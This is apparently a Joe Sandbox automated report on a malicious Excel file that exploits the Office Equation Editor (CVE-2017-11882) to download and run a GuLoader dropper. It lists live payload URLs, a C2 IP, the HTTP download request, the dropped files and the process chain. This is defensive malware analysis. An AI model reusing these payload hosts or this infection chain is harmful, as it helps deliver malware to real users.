Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7027521.xlsx

Overview

General Information

Sample Name:7027521.xlsx
Analysis ID:560280
MD5:e96baf78f2a98321ae47d4d82e608124
SHA1:e9ea3b397b7c2d5be07845745f621aef0d8d4db0
SHA256:180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
Tags:VelvetSweatshopxlsx
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 584 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1352 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 800 cmdline: "C:\Users\Public\vbc.exe" MD5: 0DCB37FF90B93B7A3225707B1AF111B8)
  • cleanup
{"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}
SourceRuleDescriptionAuthorStrings
00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 50.16.4.125, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1352, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1352, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 800
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1352, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 800

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}
    Source: 7027521.xlsxVirustotal: Detection: 48%Perma Link
    Source: 7027521.xlsxMetadefender: Detection: 23%Perma Link
    Source: 7027521.xlsxReversingLabs: Detection: 44%
    Source: http://50.16.4.125/E/raki.exeAvira URL Cloud: Label: malware
    Source: http://50.16.4.125/E/raki.exeVirustotal: Detection: 9%Perma Link

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: secur32.pdb source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
    Source: Binary string: secur32.pdbUGP source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://dariamob.ro/wed/eee_XScUCMEVL47.
    Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jan 2022 09:40:54 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14Last-Modified: Wed, 26 Jan 2022 04:12:20 GMTETag: "29888-5d6746870006c"Accept-Ranges: bytesContent-Length: 170120Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7c 04 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 f0 83 02 00 98 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /E/raki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.16.4.125Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2864187B.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /E/raki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.16.4.125Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

    System Summary

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040755C
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406D85
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73191BFF
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: raki[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: raki[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: raki[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: 7027521.xlsxVirustotal: Detection: 48%
    Source: 7027521.xlsxMetadefender: Detection: 23%
    Source: 7027521.xlsxReversingLabs: Detection: 44%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$7027521.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE8A9.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.winXLSX@4/24@0/1
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: secur32.pdb source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
    Source: Binary string: secur32.pdbUGP source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 4_2_731930C0 push eax; ret
    Source: secur32.dll.4.drStatic PE information: section name: .didat
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: secur32.dll.4.drStatic PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\sxsstore.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\secur32.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2584Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: vbc.exe, 00000004.00000002.680174022.00000000005CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
